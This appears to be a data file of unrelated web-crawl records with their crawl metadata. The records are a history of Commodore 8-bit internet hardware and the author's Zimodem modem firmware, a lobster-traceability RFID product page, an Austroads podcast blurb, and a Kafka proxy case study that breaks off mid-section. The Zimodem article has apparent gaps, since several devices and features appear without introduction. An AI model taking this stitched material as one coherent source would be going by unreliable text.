Bulletin Board Systems (BBSs) in the 1980s are sometimes compared to a primitive version of the internet, and I think there's something to that. Consider the experiences that a typical BBS caller would have when calling around. A user might start their call, for example, by engaging in instant messaging by chatting with the SysOp, then sliding into the message bases for a bit of 'social media' with the other hundred or so active users. Looking for new software, the user might then hit up the file transfers area, where perhaps a whole megabyte of games and utilities might be available, and finally head to the text file area for ANSI/PETSCII images, computer-related news, or encyclopedic articles.

But then came the actual internet. Instead of chatting with one person, you could chat with all of them. Your social media encompassed people from all over the globe. The availability of software for your computer was measured not in megabytes, but in all-the-bytes; your images and movies were measured in pixels instead of characters per line, and your access to news and information became up-to-the-minute from professional journalists. It was little wonder that BBSes did not fare well against such competition.

Some computing ecosystems handled this well. By "well", I mean that standards for network interface APIs were adopted by their communities and operating systems rather quickly. This allowed any software that wanted to provide solutions involving the internet to do so, without having to worry whether their programs would work on newer or competing internet interfaces. Some obvious examples from the early 90s are PCs with Windows via WINSOCK, Apple computers with MacTCP, Amiga computers with AmiTCP, Atari STiNG, and others. This adoption was vital for progress in networking software to occur. With only a single viable API to write, e.g., a web browser against, competing browsers could be developed, with each trying to out-do the others in features, which moved the product space forward. And whether you are looking at Internet Explorer vs Netscape, or IBrowse vs AWeb, this is exactly what happened.

Some platforms, however, did not handle the dawn of the internet particularly well. An example of this is the Commodore 8-bit line, particularly the Commodore 64. With multiple and endlessly changing internet interfaces, each one picked up and tossed aside in favor of a Shiny New Way, the result would be a relative lack of internet software, even of the limited sort that the hardware could handle, and this led to little or no competition or progress. It is this amusing history - this parade of technologies - that I will be walking you through, before I bring in my own float.

In the late 1980s and early 1990s, the initial solution for C64 users to get on the internet was an ISP "shell" account. This was functionally similar to a BBS, in the sense that a common 1980s modem was the only hardware you needed, and you used the same terminal programs to access the shell account as you did to access many other non-Commodore BBSs. During this time, demand for C64 and C128 terminal programs that supported *NIX terminal types would increase, leading to the popularity of programs like Novaterm or Desterm. At this time, the C64 "user port", where serial modems were connected, was viewed as being limited to 2400 baud. This limitation was overcome in two different ways. The first was by using the Creative Micro Designs "SwiftLink" 6551 UART cartridge.
This cartridge would consume the computer's expansion port to provide a faster dedicated standard RS-232 serial interface, capable of using faster modems available for PCs at up to 38.4 kbps. Another way higher speeds were achieved was through Daniel Dallmann's UP9600 mod, which was presented in 1997. This was a modification of the standard C= user port serial interface, which used additional pins to take advantage of that computer's automatic bit-shifting feature. As the name suggests, it enabled the C64 to reliably communicate at 9600 baud. The mod itself could be done to the modem or to the computer, and required only jumpering a few extra pins to each other. Of course, this entire variety of dial-up internet died with the loss of popularity and availability of ISP shell accounts.

So, we're still in the 1990s, and we've already got 3 hardware interfaces to the internet. This means it's time to talk about PC-based modem emulators and null-modem cables. In 1996, I was only 3 years separated from my own BBS SysOp days, when I found myself working in a computer science lab at my university. We had several rows of 386 PCs running Slackware Linux, all connected to the internet, and each with an external IP address. This meant that anyone on the internet could access any of those machines. Oh, those days of innocence! Together with some of my old BBSing friends, we engaged in a project to connect my Commodore 128 to one of these machines using a null modem cable, which is simply a serial cable that allows two computers to talk to each other. One end of the cable connected to the PC serial port, while the other end connected to the C128 user port, after going through some voltage converting chips. The C128 would be running my BBS software and watching for the "Carrier Detect" signal on the serial port to go active. Meanwhile, the PC would run a Linux terminal program called 'minicom' when a user logged in, which would automatically wake up the C128 BBS program and announce itself to the user. In effect, by remotely connecting to the PC via telnet, and logging in, you would be using a BBS, running on a Commodore 128.

My little college project illustrates the next phase in Commodore 8-bit internet access. Around the turn of the millennium, Leif Bloomquist would present "BBS Server", a Windows application that would forward TCP/IP connections from the internet to one of the PC's serial ports. The purpose was the same as my minicom example: to allow Commodore BBSs to be accessed from the internet instead of old phone lines, but it also included outgoing connection abilities with Hayes-style AT-command emulation. This was followed by a project from Jim Brain called TCPSER, which also used null modem cables. This was written as a port of BBS Server to Linux, and provided the same Hayes/C= 1670 modem emulation that BBS Server does. The last in this category was Strikelink USB by Alwyz, author of the popular CCGMS term program for the C64. In this case, the Strikelink is a cable that connects the Commodore user port serial interface to the USB port of a PC instead of the standard com port. Like the later Strikelink variations, this was never really produced for sale, but only presented as a project for interested users. These sorts of solutions are still used today. Strikelink USB, in fact, only goes back a decade. However, the requirement of having a PC physically close to your Commodore computer has probably limited its popularity overall.
For software, the C64/C128 operating system LUNIX, by Daniel Dallmann, had both a SLIP and PPoE client, as well as some very basic internet tools, such as telnet and FTP clients, and a web server. Another internet client was The Wave, for the Wheels operating system, which included a terminal program and web browser. The ethernet cradles may still be in use, but dial-up internet is not exactly common any more. Also, while LUNIX is still remembered by some, The Wave required both Wheels OS and a SuperCPU, which leaves it with a limited audience.

The mid-late 2000s saw the first ethernet bus cartridge for the C64/C128, called the RR-Net, which is short for "Retro-Replay-Net". It was produced by Individual Computers as an 'add-on' for their "Retro Replay" freeze cartridge. The cartridge contains a Cirrus Logic CS8900A ethernet chip, which is set up in 8-bit mode. Registers are then exposed on the C64 expansion port address page to allow packet bytes to be transferred back and forth. The RR-Net was eventually turned into a proper stand-alone cartridge, completely compatible with the original RR-Net add-on. These can be found under the names RR-Net MK3 from Individual Computers, TFE from Adam Dunkels, and the 64NIC+ from go4retro.com. A cartridge solution like this has the benefit of speed, but the downsides of consuming the cartridge port, and requiring that the C64 run a full TCP/IP stack, with its own buffers. Perhaps half a dozen software titles support the RR-Net, including terminals, a browser, and PC transfer tools, the most impressive being Contiki from Adam Dunkels. Contiki is a GUI operating system with a TCP/IP stack called uIP. The entire OS is essentially designed around networking, and its small selection of internet clients and tools. More recently, the 1541Ultimate-II cartridge was also released with its own ethernet port and interface. The author has provided a couple of tools, including a terminal, which supports this port. The 1541UII is reportedly also adding SwiftLink and modem emulation, to allow the use of other terminal programs. Presumably it is the same interface integrated into the Ultimate64 computer, which is an FPGA reproduction of the computer with built-in 1541Ultimate-II features.

As microcontrollers became cheaper and more full-featured, we started to see them used to give us even more internet options. The COMET 64 was released in 2008, along with the launch of its companion web site "commodoreserver.com". While COMET appears to be a user port modem with wired ethernet, it's actually better described as a storage and data exchange device. Much like Q-Link, CommodoreServer features chat and online gaming options. When a special driver is loaded on the C64 computer, the modem also provides an internet disk drive on device 2, with all files stored on the commodoreserver.com web site.

In 2015 we saw the first emergence of the "wifi" modem with the release of the Commodore WiFi Modem by Leif Bloomquist, of BBS Server fame. His user port modem was a complete "BBS Server" package in one box: it could allow incoming connections in order to run a Commodore BBS, as well as allowing outgoing connections to the emerging (re-emerging?) "Telnet BBS" phenomenon. Great care was given to the user interface of this device, with easy menu-driven configuration and use. This was the device that inspired my own interest in wifi modems.
The next year, the C64Net-WiFi modem would appear, followed soon after by the Strikelink wifi modem project, and later by several other similar devices, which you can still pick up on eBay for $25-50. Like Leif's modem, these would be user port devices, typically with UP9600 support. They all have varying features, but in common they support some variation on the Hayes AT-command set, giving them a level of compatibility with standard C64/C128 terminal programs. Related to these modem emulators is the LINK-232 WiFi. This wireless ethernet device is connected to an integrated Link-232 cartridge, which in turn is a clone of the CMD Turbo-232 cart, the successor to the SwiftLink cartridge mentioned above. Like the other wireless modems, it is compatible with a few exceptional term programs, and supports the AT command set. Aside from terminal programs, it also enjoys support from several Zimodem-compatible apps, and upcoming support from Greg Nacu's 64OS. Even more recently, the WiC 64 device was also made available for the C64. It features a user port interface like other wifi modems, but uses a parallel instead of a serial interface. Although this creates yet another software ecosystem, the advantage would be the speed boost over serial.

The last internet platforms we'll look at are also the newest: IEC serial port internet devices. The IEC bus is the C64's primary disk drive and printer port, and is supported by the C64 KERNAL as such. These IEC modems have other internet socket communication features, but their primary appeal is clearly for network-based storage. The first of these devices to appear were the COMET+ and COMET Flyer, the successors to the COMET 64 modem discussed previously. Along with them came another web site, commodoreonline.com, providing similar remote disk/file storage as commodoreserver.com did. A later addition to network storage is the PETDisk Max, from bitfixer, which has an IEEE-488 interface for PETs, but includes wifi capabilities for fetching data from disk images over the network. The newest entries in this category are the Meatloaf and the Fujinet. While not yet available, Meatloaf is reported to offer similar features to the Flyer, except that it uses more standard web protocols (WebDAV) for dealing with remote disk images and files. It seems it will also optionally include a user-port option for standard modem compatibility. The relationship between Meatloaf and Fujinet is unclear to me, but it's possible the Fujinet for the C64 will be based on Meatloaf. And that brings us up to the present.

My own story in all this begins in 1984, when I picked up a VICMODEM for my Commodore 64, and immediately became an avid BBS user. By 1985, I was running my own BBS system, initially on 64Messenger, and then switching to CMBBS. I always found one reason or another to be dissatisfied with these programs though, so in 1986 I wrote and ran my own program, called Zelch 64. In 1990, I switched to the newly written Zelch 128, and ran that until 1993. In 1996, as mentioned above, I revived the Zelch 128 BBS as a telnet-board. After 1997 though, I was a typical C= 8-bit user enjoying all the various internet options mentioned previously, until 2016. The creation of the C64Net WiFi in 2016, by Carlos Santiago of ElectronicsIsFun.com, was my first opportunity to have an impact on internet appliances for the Commodore 8-bits.
Carlos himself really wanted a way to access all the disk images he'd downloaded from the internet directly from his C64, and I suspect what he really had in mind was something closer to the Flyer or Meatloaf. However, he also wanted a proper internet modem, and so that's the direction he chose. At the time, I was a user of Leif Bloomquist's wifi modem, and was very excited about the chance to influence the features it would have.

The C64Net WiFi would be based on the Espressif ESP-8266, specifically using the incredibly cheap ESP-01 package. This microcontroller came with 1 MB of flash memory and 80 KB of user RAM, half of which is available to application programmers. The cartridge was designed to be powered entirely by the host computer using its stock power supply. This presented some serious constraints on the C64 user port, which were addressed by using both the 5V and 9VAC rails to power the device. A lot of the circuitry on the board is for converting the 9VAC to 5VDC. The interface is obviously the user port, and the pin configuration is designed to comply with the standards for Commodore user port modems, including pins for both Carrier Detect and hardware flow control. It also included the pin configuration to support UP9600, which could be disabled via jumpers for C128 users.

The speed of the C64 user port serial interface is worth discussing at this point. The most popular Commodore 8-bits (the VIC-20, C64, and C128) did not have a serial UART built into the computer. Serial communication was achieved on the computers' 8-bit parallel "user port" interface by bit-banging routines built into the operating system, called the KERNAL. Commodore initially advertised that the C64 user port could achieve a speed of 300 bps; however, it was quickly discovered that, by working around a bug in the KERNAL's bit timing table, 1200 bps could easily be supported. The C128 could handle 2400 bps, especially in its 2 MHz operating mode. By ignoring the KERNAL and using more tightly written bit-banging algorithms in assembly language (Ilker Ficicilar), speeds of 4800-7200 bps were achievable. By altering the hardware, UP9600 bumped this up to 9600 bps (Dallmann). More recently, 57,600 bps was achieved by both disabling the VIC-II video chip and timing the bit transfer by counting the CPU cycles instead of using timer interrupts from the computer I/O chips (Jorge Castillo).

So, my Zimodem project began in 2016 to provide firmware for the C64Net WiFi and its ESP-8266. From the very beginning, I had three specific goals for the project, which have been achieved to varying degrees. The first goal was that the firmware appear to the user as a Hayes/C= 1670 style modem, and have all the features expected from such a command set. The second was that the modem be a useful appliance to computers that are limited to running terminal programs. The last was that the modem be a useful internet platform, allowing it to be easily used by the host computer for writing custom network applications and games. The firmware for the C64Net uses inverted signals: high for active, low for inactive. This always struck me as intuitive, though the more I've learned about electronics, the more I realize that it's not common, including in RS-232. The AT command set includes all the standard commands and every extended command that made any sense for a WiFi modem, and many that didn't. This includes things like response codes, verbosity, duplex, and setting internal registers for auto-answer and number of rings.
That last one may not make much sense, but I tried not to assume what all BBS software might expect or be looking for. Commands were also added to list available wireless access points and to connect to one with credentials. Although I was a slave to the Espressif libraries for the types of wireless security supported, I've yet to run into any troubles in that department.

ATD, which is the command for making an outgoing call and connecting to a remote phone number, was extended to allow internet hosts and IP addresses. On connection, the modem exits command mode and enters stream mode, where bytes can be sent to and received from the remote system. Support for both hardware and software flow control was added as well, using the ATF and AT&K commands. Additional AT commands were invented to overcome the limits of old terminal programs, and expand the supported platforms. For example, the AT&P command was added to support decoding ASCII/ANSI to PETSCII, including color translation. Both ATR and ATS3 allow the carriage return character to be tweaked. "Telnet" code handling was added mostly to make a remote telnet server happy by responding properly to requests and demands. One issue I ran into here was remote telnet servers that, when receiving a telnet escape code, would immediately read the next character. When dealing with network packets, however, there is never a guarantee that all of the bytes of a telnet command would arrive in the same packet. One of the many accommodations I had to make over the years was to try and guarantee that an entire command would always be contained in the same packet. The baud rate, as well as other RS-232 settings such as data bits, stop bits, and parity, can be changed with the ATB command. Although 8N1 is practically universal, it wasn't always so, and some older terminals will desire other settings.

An important feature for supporting existing terminals and applications was the addition of a persistent phonebook. With the ATP command, fake "phone numbers" can be assigned to particular internet hosts and ports, with desired terminal settings. The phone numbers are automatically persisted to flash memory. Later, whenever the ATD command is used with an integer, the phone book is checked and the matching host connected to. This makes it easy to use the Q-Link revival server called "Q-Link Reloaded". For those unaware, Quantum Link was a C64 online service that was a predecessor to AOL. In addition to the phonebook, 38 different terminal and register settings can be persisted in the onboard flash, meaning that the modem always comes on exactly as you prefer it. This was especially important for machines that prefer odd baud rates or strange data bit and parity settings. The behavior of various pins of the microcontroller can also be read or changed using special AT commands. This was important for dealing with UARTs that required, for example, the DCD pin to always be active.

The firmware supports over-the-air updates, so there's never a need to deal with special programming cables or software to get the latest version. Updates can be checked for and downloaded on demand using the AT&U command. Specific or custom versions can also be reverted to, should one be feeling nostalgic. I often use this for testing versions with one-off features. The microcontroller does its best to maintain a real-time clock, which can be read using the AT&T command.
It will initialize this clock via the Network Time Protocol (NTP) on bootup, and the firmware will allow the TimeZone to be set. A help file for all the AT commands can be accessed with the AT&H command, which will persist the current version's help file after first access for off-line viewing.

The wifi modem can be configured with multiple incoming socket listeners on different ports. Like the phonebook, these settings can be persisted with their own terminal settings so that they are immediately available after reboots. Like the "auto-answer" mode on old modems, incoming connections can be configured to send zero or more RING messages and then go automatically into stream mode. This allows Commodore BBS programs that support Hayes or 1670 modems to work out of the box. A custom "busy message" can also be configured, so that an incoming caller, arriving while another connection is already using the serial port, knows to try back later.

Another feature in supporting the firmware as a networking platform is the ability to make and manage multiple outgoing connections. The ATC command allows a new remote client to be created, without immediately going into stream mode. Instead, the modem stays in command mode, where special AT commands allow the connections to be managed and communicated with. Whenever data is received from any of the open connections, the data is presented in the form of packets of data, which can be up to 255 bytes. These packets are preceded by a header block, which can contain information such as the connection ID that the data came from, the size of the packet, an 8-bit CRC of the packet, and the packet sequence number for that connection. If a sequence or CRC number for a packet is incorrect, the ATL command can order the modem to re-transmit a previous packet. The ATT command can be used to transmit either a string message, or a block of binary data, to a specified open connection. It can also be configured to return the CRC8 of the data block it received via serial, for error checking. Because internet data is likely to be received far faster than a 1 MHz computer can process it, there are several new flow control methods that can be turned on to manage incoming data. These are typically variations on standard software (XON/XOFF) flow control that operate at the packet instead of the character level. These are selected using the ATF command.

All of this ended up allowing me to fulfill my dream of being able to write internet applications in simple BASIC. Well, *mostly* BASIC. The problem is that BASIC V2 found in the VIC-20 and C64 does not have good string parsing functions, which makes separating the numeric data out of each packet header especially painful. The INPUT# command in BASIC also has some rather annoying parsing rules of its own. Luckily, during my BBS days, I learned how to create BASIC strings from machine language. I therefore wrote some packet machine language routines, which I call "PML", that I can call from BASIC to quickly parse the information from incoming packets, leaving the data in a BASIC string variable. With that, then, I cobbled together some super simple internet applications, such as IRC (Internet Relay Chat) for instant messaging, an FTP (File Transfer Protocol) application for uploading and downloading files from FTP sites, a wget application for downloading web pages or binary files from web servers, and a d64wget for downloading .D64/.D71/etc. disk images directly from a web server to a blank floppy.
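To make that packet framing concrete, here is a rough sketch in Go of the sort of parsing and checking a client has to do. The header layout (connection ID, size, sequence, CRC) and the CRC-8 polynomial used below are illustrative assumptions for this sketch, not the firmware's documented format; on a real C64, this is the kind of work the PML routines do in machine language.

```go
package main

import "fmt"

// crc8 computes a simple CRC-8 over data using the polynomial 0x07.
// The real firmware may use a different polynomial; this is illustrative.
func crc8(data []byte) byte {
	var crc byte
	for _, b := range data {
		crc ^= b
		for i := 0; i < 8; i++ {
			if crc&0x80 != 0 {
				crc = (crc << 1) ^ 0x07
			} else {
				crc <<= 1
			}
		}
	}
	return crc
}

// packet models the information the header is described as carrying: which
// connection the data came from, the payload size, a sequence number, and a CRC.
type packet struct {
	ConnID  byte
	Size    byte
	Seq     byte
	CRC     byte
	Payload []byte
}

// parsePacket reads an assumed header layout of [connID][size][seq][crc][payload...].
func parsePacket(raw []byte) (packet, error) {
	if len(raw) < 4 {
		return packet{}, fmt.Errorf("short packet: %d bytes", len(raw))
	}
	p := packet{ConnID: raw[0], Size: raw[1], Seq: raw[2], CRC: raw[3]}
	if int(p.Size) != len(raw)-4 {
		return packet{}, fmt.Errorf("size mismatch")
	}
	p.Payload = raw[4:]
	if crc8(p.Payload) != p.CRC {
		// A real client would ask for retransmission (e.g., via ATL) here.
		return packet{}, fmt.Errorf("CRC mismatch on connection %d, seq %d", p.ConnID, p.Seq)
	}
	return p, nil
}

func main() {
	payload := []byte("HELLO")
	raw := append([]byte{1, byte(len(payload)), 7, crc8(payload)}, payload...)
	p, err := parsePacket(raw)
	fmt.Println(p.ConnID, p.Seq, string(p.Payload), err)
}
```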
I also wrote a telnetd server that allows an incoming internet user to remotely "take control" of the C64 BASIC prompt and use the computer as if they were sitting in front of it, so long as they limit their activity to text input and output. I did also write some super simple telnet and PETSCII terminal programs, just as examples. There are far better terminal programs out there.

GEOS, also for the C64 and C128, supports proper printer drivers, so it was a relatively simple matter to produce one that supports the network printing features of the modem. GEOS has a graphical WYSIWYG paradigm for printing; all printouts are actually pictures of what was on the screen. Luckily, the IPP protocol specification lists native support for an image format called RAS, which CUPS also supports. The GEOS printer driver, therefore, has only to translate the screen image data into a RAS-formatted image before sending it to the modem for printing. This project was called ras4c64net, and can be found on GitHub. The Amiga also supports printer drivers, but the documentation on how to write them is much less straightforward. I'd love to talk to anyone who's actually written one, as what I found on Aminet and in my books did not click with me. Instead, I relied on the fact that the Amiga supports serial-based printers and that later versions of AmigaOS come with a PostScript printer driver. I therefore added a feature in the firmware's command mode that would automatically detect when a PostScript file was being dumped into the modem, and immediately go into printing mode.

The Gurumodem was also designed with an SD card interface, and therefore needed some way to access it via the modem. This was done by adding the AT+SHELL command, which provides a command line prompt into which you can enter well-known file and directory commands such as dir, copy, move, makedir, cd, etc. So that users of many platforms would feel comfortable, it also supports aliases of all these commands, such as "$", "ls", or "list" for directory, and similar aliases for other commands. The shell also includes a simple FTP client for fetching files from the internet to the FAT-formatted SD card. Getting files from the SD card to the host computer is done through the built-in shell support for uploading and downloading via the X-Modem protocol, Z-Modem protocol, or KERMIT. The latter protocol was added primarily to support the Commodore 900's only stock terminal software. Shell commands can also be entered directly from command mode by adding a colon after AT+SHELL followed by the command. For example, AT+SHELL:list would list the current SD card directory to the modem, while remaining in command mode.

The Commodore SuperPET natively supports a special serial-port file management protocol called "HOSTCM", which was used to send data to and from other central computers. This 'mode' is turned on with the AT+HOSTCM command.

So, that's where things stand with the firmware as of June 2023. Several new features are actively in the works, or coming very soon. One is SLIP/PPoE support, which has been on the TODO list almost from the very beginning. The ability to leverage LUNIX and support The Wave browser would be an amazing boon. Integrating with lwIP in a way that doesn't trash otherwise normal operation has been tricky, but it's coming. I also have been eager to add pulse-dialing support to the modem, along with pin-level emulation of the Commodore 1650/1660.
This would be an amazing addition because of all the pre-1986 software that would instantly become compatible with it, including terminal programs, BBS software, and the game Modem Wars. Lastly, an integrated GOPHER client has been requested, for the extremely limited platform crowd. GOPHER is a fun idea though, as I recall thinking at one point that it was far superior to HTTP and HTML. Apparently, there are still people running GOPHER servers out there, so the usefulness would be immediate.

The creator of the WiFi Retromodem at tempestfpga.com has also recently created an ESP-32-based modem that fits in an old Hayes modem case. To the Zimodem firmware, he added the ability to play old modem sounds out of a speaker, which is absolutely delightful. Perhaps that will be integrated into the main branch soon. Otherwise, I'm always open to suggestions and bug reports. Please post them in the "Issues" section of my Zimodem repository on GitHub.

Well, that wraps up this very, very long look back at internet solutions for the Commodore 8-bits, and how my own projects have woven in and out of that tapestry. I hope you enjoyed the parade, and perhaps learned about some technology you'd never heard of. I also sincerely hope you recognize the potential the 8-bits have as networking clients, if we can only settle on an API. Here are some parting resources:
- Project page: github.com/bozimmerman/zimodem
- C64/128 BBS Software page: bbs.zimmers.net
- The "Zelch BBS": coffeemud.net:6502
- MMORPG for old machines: coffeemud.net:23
systems_science
https://sednatech.io/dockside-traceability/
2022-10-02T21:36:40
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00397.warc.gz
0.910941
323
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__183097789
en
Tracking movement of inventory from the moment of purchase
Digitizing paperwork to streamline purchasing processes.
RFID tags are placed on crates of lobsters when they are purchased at the dockside location – attaching specific information and allowing the product to be scanned and traced as it moves throughout the supply chain. Mobile printers are linked to our handhelds to allow harvester receipts to be printed instantly, eliminating the need to manually write slips. Location and volumes of product are tracked in real time, and a complete digital history of the movement of products is logged. The head office has access to this information in real time, which improves production planning.
Hardware: A network of handheld devices, mobile printers and RFID tags.
Software: Sedna's software powers all mobile devices and interacts directly with our cloud database in real time, allowing the back office to view purchase orders and sales orders at the time of transaction. In addition, real-time information on your raw material acquisition improves production management and product quality, as known purchases can be transported to holding environments more efficiently.
- Eliminates manual data entry
- Easy-to-use interface
- Crate-level inventory tracking
- Improves transparency and accountability
Accountability of workers
Automated digital history & location
Reduce human error
"We track every crate of lobsters with Sedna's RFID inventory system."
"Our operation is now digitized from dock to sale"
systems_science
http://podcasts.austroads.com.au/p/about-1518153494/
2022-05-29T11:18:46
s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662644142.66/warc/CC-MAIN-20220529103854-20220529133854-00629.warc.gz
0.924607
262
CC-MAIN-2022-21
webtext-fineweb__CC-MAIN-2022-21__0__233965942
en
This Podcast broadcasts recordings of Austroads' technical and research webinars. Austroads is the peak organisation of Australasian road transport and traffic agencies. Our members are collectively responsible for the management of over 900,000 kilometres of roads valued at more than $200 billion, representing the single largest community asset in Australia and New Zealand. Austroads' purpose is to support our member organisations to deliver an improved Australasian road transport network. One that meets the future needs of the community, industry and economy. A road network that is safer for all users and provides vital and reliable connections to place and people. A network that uses resources wisely and is mindful of its impact on the environment. To succeed in this task, we undertake leading-edge road and transport research which underpins our input to policy development and published guidance on the design, construction and management of the road network and its associated infrastructure. We also administer the National Exchange of Vehicle and Driver Information System (NEVDIS), a unique national system which enables road authorities to interact across state borders and directly supports the transport and automotive industries. For enquiries about Austroads or this Podcast, please email [email protected]. To participate in our live broadcasts, register via our events page.
systems_science
https://team-triage.github.io/case-study
2024-03-03T09:02:35
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476211.69/warc/CC-MAIN-20240303075134-20240303105134-00024.warc.gz
0.92591
6,622
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__958249
en
Triage - A Kafka Proxy
Triage is an open-source consumer proxy for Apache Kafka that solves head-of-line blocking (HoLB) caused by poison pill messages and non-uniform consumer latency. Once deployed, poison pill messages will be identified and delivered to a dead letter store. By enabling additional consumer instances to consume messages, Triage uses parallelism to ensure that an unusually slow message will not block the queue. Our goal was to create a service that could deal with HoLB in a message queue while making it easy for consumer application developers to maintain their existing workflow. This case study will begin by exploring the larger context of microservices and the role of message queues in facilitating event-driven architectures. It will also describe some of the basics regarding Kafka's functionality and how HoLB can affect consumers, followed by an overview of existing solutions. Finally, we will dive into the architecture of Triage, discuss important technical decisions we made, and outline the key challenges we faced during the process.
Problem Domain Setup
The World of Microservices
Over the last decade, microservices have become a popular architectural choice for building applications. By one estimate from 2020, 63% of enterprises have adopted microservices, and many are satisfied with the tradeoffs. Decoupling services often leads to faster development time since work on different services can be done in parallel. Additionally, many companies benefit from the ability to independently scale individual components of their architecture, and this same decoupling makes it easier to isolate failures in a system. Microservice architectures are flexible enough to allow different technologies and languages to communicate within the same system, creating a polyglot environment. This flexibility enables a multitude of different approaches for achieving reliable intra-system communication. Two common options are the request-response pattern and event-driven architecture (EDA). Although the latter is where our focus lies, it is useful to have some context on the shift toward EDAs.
From Request-Response to Event-Driven Architecture
A typical request-response pattern is commonly used on the web, and that is no different from what we are referring to here. For example, imagine a number of interconnected microservices. One of them sends a request to another and waits for a response. If any one of the services in this chain experiences lag or failure, slowdowns cascade throughout the entire system. In an EDA, however, the approach is centered around "events", which can be thought of as any changes in state or notifications about a change. The key advantage is that each service can operate without concern for the state of any other service - they perform their tasks without interacting with other services in the architecture. EDAs are often implemented using message queues. Producers write events to the message queue, and consumers read events off of it. For example, imagine an online store - a producer application might detect that an order has been submitted and write an "order" event to the queue. A consumer application could then see that order, dequeue it, and process it accordingly.
What is Kafka?
In a traditional message queue, events are read and then removed from the queue. An alternative approach is to use log-based message queues, which persist events to a log.
Among log-based message queues, Kafka is the most popular – over 80% of Fortune 100 companies use Kafka as part of their architecture. Kafka is designed for parallelism and scalability and maintains the intended decoupling of an EDA. In Kafka, events are called messages.
How Does Kafka Work?
Typically, when talking about Kafka, we are referring to a Kafka cluster - a cluster is comprised of several servers, referred to as brokers, working in conjunction. A broker receives messages from producers, persists them, and makes them available to consumers. Topics are named identifiers used to group messages together. Topics, in turn, are broken down into partitions. To provide scalability, each partition of a given topic can be hosted on a different broker. This means that a single topic can be scaled horizontally across multiple brokers to provide performance beyond the ability of a single broker. Each instance of a consumer application can then read from a partition, allowing for parallel processing of messages within a topic. Consumers are organized into consumer groups under a common group ID to enable Kafka's internal load balancing. It is important to note that while a consumer instance can consume from more than one partition, a partition can only be consumed by a single consumer instance. If the number of instances is higher than the number of available partitions, some instances will remain inactive. Internally, Kafka uses a mechanism called "commits" to track the successful processing of messages. Consumer applications periodically send commits back to the Kafka cluster, indicating the last message they've successfully processed. Should a consumer instance go down, Kafka will have a checkpoint to resume message delivery from.
Head-of-Line Blocking in Kafka
A significant problem that can be experienced when using message queues is head-of-line blocking (HoLB). HoLB occurs when a message at the head of the queue blocks the messages behind it. Since Kafka's partitions are essentially queues, messages may block the line for two common reasons – poison pills and unusually slow messages. Poison pills are messages that a consumer application receives but cannot process. Messages can become poison pills for a host of reasons, such as corrupted or malformed data.
HoLB Due to Poison Pills
To better understand how poison pills cause HoLB, imagine an online vendor tracking orders on a website. Each order is produced to an orders topic. A consumer application is subscribed to this topic and needs to process each message so that a confirmation email for orders can be sent to customers. The consumer application expects to receive a message that contains an integer for the product_id field, but instead, it receives a message with no value for that field. With no mechanism to deal with this poison pill, processing halts. This will stop all orders behind the message in question even though they could be processed without problems.
Non-Uniform Consumer Latency
Slow messages can cause non-uniform consumer latency, where a consumer takes an unusually long time to process a message. For instance, suppose a consumer application makes a call to one of many external services based on the contents of a message. If one of these external services is sluggish, a message's processing time will be unusually slow. Messages in the queue that don't rely on the delayed external service will also experience an increase in processing latency.
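Before walking through those scenarios in more detail, the sketch below shows what the consumer side described above looks like in practice: a bare-bones Go consumer using the segmentio/kafka-go client (one of several available clients; the broker address and topic are made up). It joins a consumer group, reads from whichever partitions it is assigned, and commits offsets only after processing succeeds.

```go
package main

import (
	"context"
	"fmt"
	"log"

	"github.com/segmentio/kafka-go"
)

func main() {
	// Joining a consumer group lets Kafka balance partitions across instances.
	r := kafka.NewReader(kafka.ReaderConfig{
		Brokers: []string{"localhost:9092"}, // assumed broker address
		GroupID: "order-emailer",            // consumer group ID
		Topic:   "orders",                   // assumed topic name
	})
	defer r.Close()

	ctx := context.Background()
	for {
		// FetchMessage does not commit automatically; we commit explicitly below.
		m, err := r.FetchMessage(ctx)
		if err != nil {
			log.Fatal(err)
		}
		fmt.Printf("partition %d offset %d: %s\n", m.Partition, m.Offset, m.Value)

		// Only after successful processing do we record progress with Kafka.
		if err := r.CommitMessages(ctx, m); err != nil {
			log.Fatal(err)
		}
	}
}
```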
HoLB Due to Non-Uniform Consumer Latency
To illustrate how non-uniform consumer latency causes HoLB, imagine a consumer application that is subscribed to the greenAndOrangeMessages topic. It receives the messages and routes them to one of two external services based on their color.
- If the message is green, it is sent to the green external service, called Green Service.
- If the message is orange, it is sent to the orange external service, called Orange Service.
As the consumer is pulling messages, there's a sudden spike in latency in the response from Orange Service. When the consumer calls Orange Service while processing the orange message, the lack of response blocks the processing of all messages behind it. Although all the messages behind the orange message are green, they cannot be processed by the consumer, even though Green Service is functioning normally. Here, non-uniform consumer latency slows down the entire partition and causes HoLB.
The consequences of HoLB in a message queue can range from disruptive, such as slow performance, to fatal - potential crashes. An obvious solution to these issues might be simply dropping messages; however, in many cases, data loss is unacceptable. For our use case, an ideal solution would retain all messages. Based on the problem space described, we determined the following requirements for a solution:
- It should be publicly available to consumer application developers.
- It should serve developers working in a polyglot microservices environment.
- It should prevent data loss (messages should never be dropped).
- It should integrate smoothly into existing architectures.
- It should be easily deployed regardless of the user's cloud environment (if any).
With the aforementioned requirements in mind, we extensively researched existing solutions and approaches to solving HoLB. The solutions we found ranged from built-in Kafka configurations to service models built to support large Kafka deployments.
By default, the Kafka consumer library sends commits back to Kafka every 5 seconds, regardless of whether a message has been successfully processed. Where data loss is not an issue, auto-commit is a reasonable solution to HoLB. If a problematic message is encountered, the application can simply drop the message and move on. However, where data loss is unacceptable, this approach will not work.
Confluent Parallel Consumer
Confluent Parallel Consumer (CPC) is a Java Kafka Consumer library that seemingly addresses HoLB by offering an increase in parallelism beyond partition count for a given topic. It operates by processing messages in parallel using multiple threads on the consumer application's host machine. While CPC is an attractive solution, there were a few areas where it differed from our design requirements. The most obvious shortcoming for us was the fact that it's written in Java. In modern polyglot microservice environments, this presents a notable con - any developer wanting to utilize the advantages of CPC would need to rewrite their applications in Java. Additionally, our requirements did not permit data loss; while setting up data loss prevention with CPC is feasible, we sought a solution that came with this functionality out of the box.
Kafka Workers (DoorDash)
DoorDash chose to leverage Kafka to help them achieve their goals of rapid throughput and low latency. Unfortunately, their use of Kafka introduced HoLB caused by non-uniform consumer latency.
